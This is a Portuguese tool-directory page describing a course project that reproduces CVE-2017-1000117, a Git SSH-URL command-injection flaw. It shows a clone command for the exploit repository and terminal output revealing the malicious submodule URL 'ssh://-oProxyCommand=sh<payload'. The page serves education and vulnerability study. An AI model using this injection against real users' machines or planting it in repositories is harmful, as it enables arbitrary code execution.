Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-1000117 — Reprodução da vulnerabilidade CVE-2017-1000117 (PoC+Exp) | Kitploit
Ferramentas/GitHubGitHub/anonymking/cve-2017-1000117
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebAprendizado e EducaçãoLabs e Prática
GitHubanonymking/cve-2017-1000117

CVE-2017-1000117

Reprodução da vulnerabilidade CVE-2017-1000117 (PoC+Exp)

Ver Repositório
321há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2017-1000117

Resumo do Projeto

  • Um dos tópicos do projeto do curso de segurança de redes
  • Reprodução da vulnerabilidade CVE-2017-1000117 (PoC+Exp)
  • Git + SSH

Introdução à Vulnerabilidade

  • Nome da vulnerabilidade: Vulnerabilidade de injeção de comandos Git
  • ID CNNVD: CNNVD-201708-670
  • Nível de perigo: Médio
  • ID CVE: CVE-2017-1000117
  • Tipo de vulnerabilidade: Injeção de comandos
  • Data de divulgação: 2017-08-16
  • Tipo de ameaça: Remota
  • Data de atualização: 2017-10-17
  • Fabricante: git-scm
  • Fonte da vulnerabilidade: TrevorJay
  • Resumo: Git é um sistema de controle de versão distribuído gratuito e de código aberto desenvolvido pelo desenvolvedor de software americano Linus Torvalds. Versões do Git anteriores a 2.7.5 contêm uma vulnerabilidade de comando. Atacantes remotos podem explorar esta vulnerabilidade através de uma URL especialmente criada 'ssh://...' para executar programas arbitrários em dispositivos que já foram encerrados.

Processo de Exploração

  • Instale uma versão do Git dentro do intervalo vulnerável (Git para Linux、Git para Windows))
  • Aqui escolhi a versão (testei e funciona tanto no Linux quanto no Windows) (Os links de download para a versão no Linux e Windows são respectivamente e )
git-2.12.1
2.12.1
git-2.12.1.tar.gz
Git-2.12.1-64-bit.tar.bz2
  • Após instalar o Git, clone o projeto incluindo submódulos diretamente: git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
  • root@kitploit:~
    $ git clone --recursive https://github.com/AnonymKing/CVE-2017-1000117.git
    Cloning into 'CVE-2017-1000117'...
    remote: Enumerating objects: 14, done.
    remote: Counting objects: 100% (14/14), done.
    remote: Compressing objects: 100% (13/13), done.
    remote: Total 14 (delta 3), reused 8 (delta 0), pack-reused 0
    Unpacking objects: 100% (14/14), done.
    Submodule 'exploit' (ssh://-oProxyCommand=sh<payload /exploit) registered for path 'exploit'
    Cloning into 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit'...
    Pseudo-terminal will not be allocated because stdin is not a terminal.
    
    
    *********************************************
                       _ooOoo_
                      o8888888o
                      88" . "88
                      (| -_- |)
                      O\  =  /O
                   ____/`---'\____
                 .'  \\|     |//  `.
                /  \\|||  :  |||//  \
               /  _||||| -:- |||||-  \
               |   | \\\  -  /// |   |
               | \_|  ''\---/''  |   |
               \  .-\__  `-`  ___/-. /
             ___`. .'  /--.--\  `. . __
          ."" '&lt;  `.___\_&lt;|>_/___.'  >'"".
         | | :  `- \`.;`\ _ /`;.`/ - ` : | |
         \  \ `-.   \_ __\ /__ _/   .-` /  /
    ======`-.____`-.___\_____/___.-`____.-'======
                       `=---='
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    
    ssh_exchange_identification: Connection closed by remote host
    fatal: Could not read from remote repository.
    
    Please make sure you have the correct access rights
    and the repository exists.
    fatal: clone of 'ssh://-oProxyCommand=sh<payload /exploit' into submodule path 'C:/Users/AnonymKing/Desktop/Git-2.12.1-64-bit/test/CVE-2017-1000117/exploit' failed
    Failed to clone 'exploit'. Retry scheduled
    
    • Quando você vê o Buda aparecer, a vulnerabilidade já foi reproduzida e o código malicioso no payload foi executado com sucesso.

    Atualização em 21/06/2019 10:30

    • Ao escrever o relatório, descobri de repente que esta vulnerabilidade é muito semelhante à CVE-2018-17456, apenas com uma abordagem diferente. A causa raiz é a incapacidade de analisar corretamente o símbolo "-", confundindo-o com um parâmetro, o que leva à execução arbitrária de código.
    • Sobre a exploração da vulnerabilidade CVE-2018-17456, consulte este artigo do blog: [《Análise da vulnerabilidade Git Submodule (CVE-2018-17456)》](https://paper.seebug.org/716/](https://paper.seebug.org/716/)

    Atualização em 21/06/2019 19:39

    • Ao pesquisar materiais relacionados, encontrei outra vulnerabilidade muito semelhante, CVE-2018-11235
    • Sobre a vulnerabilidade CVE-2018-11235, aqui estão alguns artigos de referência: CVE-2018-11235 git RCE, PoC exploit for CVE-2018-11235, Análise detalhada da vulnerabilidade de execução remota de código do Git (CVE-2018-11235)
    Baixar ferramenta